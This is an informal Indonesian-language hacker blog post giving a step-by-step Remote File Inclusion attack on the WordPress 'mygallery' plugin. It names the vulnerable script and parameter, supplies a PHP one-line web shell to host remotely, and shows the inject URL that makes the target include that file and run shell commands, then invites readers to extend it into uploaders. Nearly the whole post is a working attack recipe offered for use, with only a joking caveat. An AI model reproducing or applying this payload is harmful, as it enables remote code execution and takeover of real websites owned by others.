Ecek-ecek

Tadi ada temen nanya, kenapa ada web yang bisa RFI tapi gak bisa ngapa-ngapain. Terjadi pada bug plugin WP, yaitu plugin mygallery. Awalnya bisa di inject remote file nya udah ter-include dengan baik, tapi saat mau melakukan sesuatu, pasti error. Ini contoh bug nya.

http://target.com/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=

Saya masih males mencari apa penyebabnya (males apa emang gak ngerti yah.. wotefe lah :) ). Saya hanya mencoba langsung saja, mengusahakan agar bisa melakukan command shell. Caranya :

1. Buat file yg akan dipakai buat peng-inject di hosting sampeyan.
2. Isi filenya

   <? passthru($_GET[cmd]);exit; ?>

3. Proses inject. http://...../mygallerybrowser.php?cmd=id;pwd&myPath=http://file.kamu?
4. Ini cuman konsep awal, kalo mau buat file transfer atau uploader, silakan buat sendiri file untuk injectnya :)

OK bebeh... itu tadi cara injek jaman batu, jalanin command di url, waktu belum ada phpshell seperti r57 atau c99.

Duh, jadi ngajari elek meneh kie, BTW, "jangan brutal" as reel said :)